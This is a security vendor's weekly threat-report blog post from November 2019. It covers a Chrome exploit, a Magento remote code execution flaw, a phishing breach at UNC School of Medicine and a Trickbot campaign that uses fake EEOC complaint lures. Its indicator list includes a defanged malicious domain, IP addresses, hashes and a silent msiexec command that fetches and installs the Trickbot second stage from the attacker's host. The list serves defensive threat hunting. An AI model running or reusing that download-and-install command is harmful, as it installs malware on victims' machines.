Paul Scott

Paul Scott
on November 14, 2019

Threat Report Thursday November 14th 2019

Threat Report

We’re back with another edition of the usually weekly threat report. This week we’re highlighting two critical vulnerabilities, a case of business email compromise for a medical school, and a Trickbot campaign targeting U.S. government offices.

Chrome vulnerability on Exploit.in with YouTube demo

If you haven’t updated Chrome recently, you might want to. In early November, a critical use-after-free vulnerability was disclosed for Google Chrome (CVE-2019-13720). Earlier this week a Proof-of-Concept exploit for the vulnerability was posted on YouTube by Tony Stack.

The vulnerabilities have been patched via Chrome version 78.0.3904.87 but older versions are being actively exploited. Users on the Exploit.in forum have been discussing the vulnerability which shows that many threat actors want to leverage the vulnerability against out of date versions of Chrome.

On the YouTube post, user ironman, aka Tony Stack, shares the steps to exploit the Chrome vulnerability. You can get more details from Tony on cve-2019-13720.com and on GitHub.

Remote code execution vulnerability for Magento

E-commerce platform Magento warned its users to apply a security patch for a remote code execution vulnerability tracked CVE-2019-8144 impacting Magento 2.3 prior to 2.3.3 or 2.3.2-p.

The vulnerability could allow unauthenticated attackers to deliver malicious payloads into a merchant’s site and execute it. On October 8, 2019, Magento released a security update to address the vulnerability, but some installations remain vulnerable for users who have not applied the security update. Users are advised to update to Magento Commerce 2.3.3 and the security-only patch 2.3.2-p2 to address the vulnerability.

In addition to applying security patches, Magento also recommends checking websites and servers to see if it was potentially compromised before upgrading.

Phishing attack leads to BEC at UNC School of Medicine

Around 3,716 individuals may have been affected after a phishing and BEC incident which resulted in a data breach at the University of North Carolina School of Medicine. Some School of Medicine students fell victim to a cyber phishing incident via email accounts.

Between May 17, 2018, and June 18, 2018, an unauthorized third party was able to gain access to several email accounts that contain personal information of some patients, possibly related to treatments received in the UNC.

These email accounts contain information such as patients’ names, dates of birth, and demographic data such as addresses, health insurance information, health information, social security numbers, financial account information and/or credit card information.

Mail notifications to affected patients started being sent out on November 12, 2019. The university also offered limited monitoring and identity protection services to the affected individuals, which does not cover the lost damage to patients.

UNC School of Medicine is taking steps to prevent additional BEC compromise by adding multi-factor authentication and enrolling employees in security awareness training. There has been no mention if their UNC business practices will change to prevent sensitive patient information from being shared via email. Business processes involving sensitive information should not be conducted via email.

Trickbot lures employees with sexual harassment complaints from the EEOC

Fake sexual harassment complaints from the U.S. Equal Employment Opportunity Commission (EEOC) are the latest lure used by attackers to disseminate the Trickbot banking Trojan onto the devices of unsuspecting employees of large companies.

Based on availability data from Perch, this campaign is still very active with a first sighting on November 3rd, 2019. Based on the customers being targeted, the campaign seems mostly geared towards the financial service, education, retail, and health industries.

According to recent reports, the malware operators use information collected for each target to customize the phishing emails to look legitimate. The attackers use “Name_of_Victim – A grievance raised against you” subjects for each of the phishing emails to draw in the attention of their targets.

Additionally, the malicious attachments containing the Trickbot payloads have customized names and use the following format “Name_of_Victim – Harassment complaint letter (phone 111-222-3333).doc” to further entice the target into opening the attachment. Organizations should implement security monitoring processes to prevent, detect, and respond to phishing attacks. Enjoy some IoCs for your hunting pleasure.

Domain

Ftpthedocgrp[.]com

IP Addresses

108[.]167[.]140[.]193
195[.]133[.]145[.]141

2nd Stage Download (through MSI)

msiexec /i http://ftpthedocgrp[.]com/backup.msi /q

Hashes

fb3909076f570782604a67a57f7b50b3a3fde18274a0d59557dded3da6f40dc5
6af150fdbc685171ad222648a6011fa77084b4f26c1c85106f896b98efa24043
4533f6a69614dcbb8c1ea9aa48dec41dd935df14d468603bac44c8978f0f91b7
ddae2b31b8bd170957dd5efc46bd5e9414181277fde2c95c8e792ee762433ebd
6b2ddd65039d42efb0110b8f198d01f0d5abf67cf43b17021486d87396136c32
5f24c41aa68951f744c9204344d2cae0f276e57ddd91442e02d1911d7c16d138
5b08241e83eb4b0188b3052a107bd796b3c32b84b882e23715f4d12ce318368c

We'd love to hear your thoughts. Find us on Twitter, LinkedIn or write in to hello@perchsecurity.com

Next: Threat Report Wednesday October 30th 2019

Share this on:

Paul Scott

Paul Scott
on November 14, 2019


Perchy Subscribe to our blog